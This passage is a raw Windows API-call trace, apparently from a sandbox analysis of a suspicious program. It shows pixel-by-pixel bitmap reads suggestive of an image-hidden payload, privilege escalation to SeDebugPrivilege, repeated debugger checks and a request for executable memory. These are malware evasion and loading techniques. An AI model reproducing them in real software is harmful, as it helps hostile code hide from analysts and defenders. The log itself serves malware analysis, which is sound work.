width=0x4de210) returned 0x0 [0174.822] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.822] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=350, color=0x4de220) returned 0x0 [0174.822] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.822] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.822] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=351, color=0x4de220) returned 0x0 [0174.822] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.822] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.822] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=352, color=0x4de220) returned 0x0 [0174.822] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.822] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.822] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=353, color=0x4de220) returned 0x0 [0174.822] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.822] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.822] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=354, color=0x4de220) returned 0x0 [0174.822] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.822] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.822] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=355, color=0x4de220) returned 0x0 [0174.823] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.823] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.823] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=356, color=0x4de220) returned 0x0 [0174.823] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.823] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.823] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=357, color=0x4de220) returned 0x0 [0174.823] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.823] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.823] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=358, color=0x4de220) returned 0x0 [0174.823] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.823] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.823] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=359, color=0x4de220) returned 0x0 [0174.823] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.823] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.823] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=360, color=0x4de220) returned 0x0 [0174.823] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.823] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.823] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=361, color=0x4de220) returned 0x0 [0174.823] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.823] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.823] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=362, color=0x4de220) returned 0x0 [0174.823] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.823] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.824] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=363, color=0x4de220) returned 0x0 [0174.824] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.824] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.824] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=364, color=0x4de220) returned 0x0 [0174.824] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.824] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.824] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=365, color=0x4de220) returned 0x0 [0174.824] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.824] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.824] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=366, color=0x4de220) returned 0x0 [0174.824] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.824] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.824] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=367, color=0x4de220) returned 0x0 [0174.824] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.824] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.824] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=368, color=0x4de220) returned 0x0 [0174.824] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.824] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.824] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=369, color=0x4de220) returned 0x0 [0174.824] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.824] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.824] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=370, color=0x4de220) returned 0x0 [0174.824] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.824] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.824] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=371, color=0x4de220) returned 0x0 [0174.825] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.825] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.825] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=372, color=0x4de220) returned 0x0 [0174.825] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.825] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.825] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=373, color=0x4de220) returned 0x0 [0174.825] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.825] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.825] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=374, color=0x4de220) returned 0x0 [0174.825] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.825] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.825] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=375, color=0x4de220) returned 0x0 [0174.825] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.825] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.825] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=376, color=0x4de220) returned 0x0 [0174.825] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.825] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.825] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=377, color=0x4de220) returned 0x0 [0174.825] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.825] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.825] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=378, color=0x4de220) returned 0x0 [0174.825] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.825] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.825] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=379, color=0x4de220) returned 0x0 [0174.825] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.825] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.825] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=380, color=0x4de220) returned 0x0 [0174.826] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.826] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.826] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=381, color=0x4de220) returned 0x0 [0174.826] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.826] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.826] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=382, color=0x4de220) returned 0x0 [0174.826] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.826] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.826] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=383, color=0x4de220) returned 0x0 [0174.826] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.826] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.826] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=384, color=0x4de220) returned 0x0 [0174.826] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.826] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.826] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=385, color=0x4de220) returned 0x0 [0174.826] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.826] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.826] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=386, color=0x4de220) returned 0x0 [0174.826] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.826] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.826] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=387, color=0x4de220) returned 0x0 [0174.826] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.826] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.826] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=388, color=0x4de220) returned 0x0 [0174.826] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.826] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.827] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=389, color=0x4de220) returned 0x0 [0174.827] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.827] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.827] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=390, color=0x4de220) returned 0x0 [0174.827] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.827] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.827] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=391, color=0x4de220) returned 0x0 [0174.827] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.827] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.827] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=392, color=0x4de220) returned 0x0 [0174.827] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.827] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.827] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=393, color=0x4de220) returned 0x0 [0174.827] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.827] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.827] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=394, color=0x4de220) returned 0x0 [0174.827] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.827] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.827] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=395, color=0x4de220) returned 0x0 [0174.827] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.827] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.827] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=396, color=0x4de220) returned 0x0 [0174.827] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.827] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.828] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=397, color=0x4de220) returned 0x0 [0174.828] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.828] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.828] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=398, color=0x4de220) returned 0x0 [0174.828] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.828] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.828] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=399, color=0x4de220) returned 0x0 [0174.828] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.828] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.828] GdipBitmapGetPixel (bitmap=0x57afcf0, x=77, y=400, color=0x4de220) returned 0x0 [0174.828] GdipGetImageHeight (image=0x57afcf0, height=0x4de234) returned 0x0 [0174.828] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.828] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.828] GdipBitmapGetPixel (bitmap=0x57afcf0, x=78, y=0, color=0x4de220) returned 0x0 [0174.828] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.828] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.828] GdipBitmapGetPixel (bitmap=0x57afcf0, x=78, y=1, color=0x4de220) returned 0x0 [0174.828] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.828] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.828] GdipBitmapGetPixel (bitmap=0x57afcf0, x=78, y=2, color=0x4de220) returned 0x0 [0174.828] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.828] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.828] GdipBitmapGetPixel (bitmap=0x57afcf0, x=78, y=3, color=0x4de220) returned 0x0 [0174.828] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.828] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.829] GdipBitmapGetPixel (bitmap=0x57afcf0, x=78, y=4, color=0x4de220) returned 0x0 [0174.829] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.829] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.829] GdipBitmapGetPixel (bitmap=0x57afcf0, x=78, y=5, color=0x4de220) returned 0x0 [0174.829] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.829] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.829] GdipBitmapGetPixel (bitmap=0x57afcf0, x=78, y=6, color=0x4de220) returned 0x0 [0174.829] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.829] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.829] GdipBitmapGetPixel (bitmap=0x57afcf0, x=78, y=7, color=0x4de220) returned 0x0 [0174.829] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.829] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.829] GdipBitmapGetPixel (bitmap=0x57afcf0, x=78, y=8, color=0x4de220) returned 0x0 [0174.829] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.829] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.829] GdipBitmapGetPixel (bitmap=0x57afcf0, x=78, y=9, color=0x4de220) returned 0x0 [0174.829] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.829] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.829] GdipBitmapGetPixel (bitmap=0x57afcf0, x=78, y=10, color=0x4de220) returned 0x0 [0174.829] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.830] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.830] GdipBitmapGetPixel (bitmap=0x57afcf0, x=78, y=11, color=0x4de220) returned 0x0 [0174.830] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.830] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.830] GdipBitmapGetPixel (bitmap=0x57afcf0, x=78, y=12, color=0x4de220) returned 0x0 [0174.830] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.830] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.830] GdipBitmapGetPixel (bitmap=0x57afcf0, x=78, y=13, color=0x4de220) returned 0x0 [0174.830] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.830] GdipGetImageHeight (image=0x57afcf0, height=0x4de210) returned 0x0 [0174.830] GdipBitmapGetPixel (bitmap=0x57afcf0, x=78, y=14, color=0x4de220) returned 0x0 [0174.830] GdipGetImageWidth (image=0x57afcf0, width=0x4de210) returned 0x0 [0174.830] GdipBitmapGetPixel (bitmap=0x57afcf0, x=78, y=15, color=0x4de220) returned 0x0 [0175.182] GetCurrentProcessId () returned 0x678 [0175.184] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x4dcc6c | out: lpLuid=0x4dcc6c*(LowPart=0x14, HighPart=0)) returned 1 [0175.185] GetCurrentProcess () returned 0xffffffff [0175.185] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x4dcc68 | out: TokenHandle=0x4dcc68*=0x2a8) returned 1 [0175.186] AdjustTokenPrivileges (in: TokenHandle=0x2a8, DisableAllPrivileges=0, NewState=0x2263c3c*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0175.186] CloseHandle (hObject=0x2a8) returned 1 [0175.186] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x2a8 [0175.187] GetExitCodeProcess (in: hProcess=0x2a8, lpExitCode=0x2263bc8 | out: lpExitCode=0x2263bc8*=0x103) returned 1 [0175.196] CheckRemoteDebuggerPresent (in: hProcess=0x2a8, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.196] GetCurrentProcessId () returned 0x678 [0175.196] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x274 [0175.196] GetExitCodeProcess (in: hProcess=0x274, lpExitCode=0x2263cdc | out: lpExitCode=0x2263cdc*=0x103) returned 1 [0175.197] CheckRemoteDebuggerPresent (in: hProcess=0x274, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.197] GetCurrentProcessId () returned 0x678 [0175.197] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x268 [0175.197] GetExitCodeProcess (in: hProcess=0x268, lpExitCode=0x2263e2c | out: lpExitCode=0x2263e2c*=0x103) returned 1 [0175.197] CheckRemoteDebuggerPresent (in: hProcess=0x268, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.197] GetCurrentProcessId () returned 0x678 [0175.197] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x2ac [0175.197] GetExitCodeProcess (in: hProcess=0x2ac, lpExitCode=0x2263ee4 | out: lpExitCode=0x2263ee4*=0x103) returned 1 [0175.197] CheckRemoteDebuggerPresent (in: hProcess=0x2ac, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.197] GetCurrentProcessId () returned 0x678 [0175.197] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x278 [0175.197] GetExitCodeProcess (in: hProcess=0x278, lpExitCode=0x2263f9c | out: lpExitCode=0x2263f9c*=0x103) returned 1 [0175.197] CheckRemoteDebuggerPresent (in: hProcess=0x278, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.197] GetCurrentProcessId () returned 0x678 [0175.197] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x27c [0175.198] GetExitCodeProcess (in: hProcess=0x27c, lpExitCode=0x2264054 | out: lpExitCode=0x2264054*=0x103) returned 1 [0175.198] CheckRemoteDebuggerPresent (in: hProcess=0x27c, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.198] GetCurrentProcessId () returned 0x678 [0175.198] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x2b0 [0175.198] GetExitCodeProcess (in: hProcess=0x2b0, lpExitCode=0x226410c | out: lpExitCode=0x226410c*=0x103) returned 1 [0175.198] CheckRemoteDebuggerPresent (in: hProcess=0x2b0, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.198] GetCurrentProcessId () returned 0x678 [0175.198] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x280 [0175.198] GetExitCodeProcess (in: hProcess=0x280, lpExitCode=0x22641c4 | out: lpExitCode=0x22641c4*=0x103) returned 1 [0175.198] CheckRemoteDebuggerPresent (in: hProcess=0x280, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.198] GetCurrentProcessId () returned 0x678 [0175.198] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x284 [0175.198] GetExitCodeProcess (in: hProcess=0x284, lpExitCode=0x226427c | out: lpExitCode=0x226427c*=0x103) returned 1 [0175.198] CheckRemoteDebuggerPresent (in: hProcess=0x284, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.198] GetCurrentProcessId () returned 0x678 [0175.198] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x2b4 [0175.198] GetExitCodeProcess (in: hProcess=0x2b4, lpExitCode=0x2264334 | out: lpExitCode=0x2264334*=0x103) returned 1 [0175.199] CheckRemoteDebuggerPresent (in: hProcess=0x2b4, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.199] GetCurrentProcessId () returned 0x678 [0175.199] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x2c4 [0175.199] GetExitCodeProcess (in: hProcess=0x2c4, lpExitCode=0x22643ec | out: lpExitCode=0x22643ec*=0x103) returned 1 [0175.199] CheckRemoteDebuggerPresent (in: hProcess=0x2c4, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.199] GetCurrentProcessId () returned 0x678 [0175.199] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x2b8 [0175.199] GetExitCodeProcess (in: hProcess=0x2b8, lpExitCode=0x22644a4 | out: lpExitCode=0x22644a4*=0x103) returned 1 [0175.199] CheckRemoteDebuggerPresent (in: hProcess=0x2b8, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.199] GetCurrentProcessId () returned 0x678 [0175.199] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x288 [0175.199] GetExitCodeProcess (in: hProcess=0x288, lpExitCode=0x226455c | out: lpExitCode=0x226455c*=0x103) returned 1 [0175.199] CheckRemoteDebuggerPresent (in: hProcess=0x288, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.199] GetCurrentProcessId () returned 0x678 [0175.199] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x28c [0175.199] GetExitCodeProcess (in: hProcess=0x28c, lpExitCode=0x2264614 | out: lpExitCode=0x2264614*=0x103) returned 1 [0175.199] CheckRemoteDebuggerPresent (in: hProcess=0x28c, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.200] GetCurrentProcessId () returned 0x678 [0175.200] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x2bc [0175.200] GetExitCodeProcess (in: hProcess=0x2bc, lpExitCode=0x22646cc | out: lpExitCode=0x22646cc*=0x103) returned 1 [0175.200] CheckRemoteDebuggerPresent (in: hProcess=0x2bc, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.200] GetCurrentProcessId () returned 0x678 [0175.200] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x290 [0175.200] GetExitCodeProcess (in: hProcess=0x290, lpExitCode=0x2264784 | out: lpExitCode=0x2264784*=0x103) returned 1 [0175.200] CheckRemoteDebuggerPresent (in: hProcess=0x290, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.200] GetCurrentProcessId () returned 0x678 [0175.200] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x2c0 [0175.200] GetExitCodeProcess (in: hProcess=0x2c0, lpExitCode=0x226483c | out: lpExitCode=0x226483c*=0x103) returned 1 [0175.200] CheckRemoteDebuggerPresent (in: hProcess=0x2c0, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.200] GetCurrentProcessId () returned 0x678 [0175.200] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x2cc [0175.200] GetExitCodeProcess (in: hProcess=0x2cc, lpExitCode=0x22648f4 | out: lpExitCode=0x22648f4*=0x103) returned 1 [0175.200] CheckRemoteDebuggerPresent (in: hProcess=0x2cc, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.208] VirtualProtect (in: lpAddress=0x5bf0400, dwSize=0x64400, flNewProtect=0x40, lpflOldProtect=0x4dd550 | out: lpflOldProtect=0x4dd550*=0x0) returned 0 [0175.214] GetCurrentProcessId () returned 0x678 [0175.214] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x294 [0175.214] GetExitCodeProcess (in: hProcess=0x294, lpExitCode=0x22649ac | out: lpExitCode=0x22649ac*=0x103) returned 1 [0175.214] CheckRemoteDebuggerPresent (in: hProcess=0x294, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.214] GetCurrentProcessId () returned 0x678 [0175.214] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x298 [0175.214] GetExitCodeProcess (in: hProcess=0x298, lpExitCode=0x2264a64 | out: lpExitCode=0x2264a64*=0x103) returned 1 [0175.214] CheckRemoteDebuggerPresent (in: hProcess=0x298, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.214] GetCurrentProcessId () returned 0x678 [0175.214] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x29c [0175.214] GetExitCodeProcess (in: hProcess=0x29c, lpExitCode=0x2264b1c | out: lpExitCode=0x2264b1c*=0x103) returned 1 [0175.214] CheckRemoteDebuggerPresent (in: hProcess=0x29c, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.214] GetCurrentProcessId () returned 0x678 [0175.215] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x678) returned 0x2a0 [0175.215] GetExitCodeProcess (in: hProcess=0x2a0, lpExitCode=0x2264bd4 | out: lpExitCode=0x2264bd4*=0x103) returned 1 [0175.215] CheckRemoteDebuggerPresent (in: hProcess=0x2a0, pbDebuggerPresent=0x4dd3b0 | out: pbDebuggerPresent=0x4dd3b0) returned 1 [0175.215] GetCurrentProcessId () returned 0x678 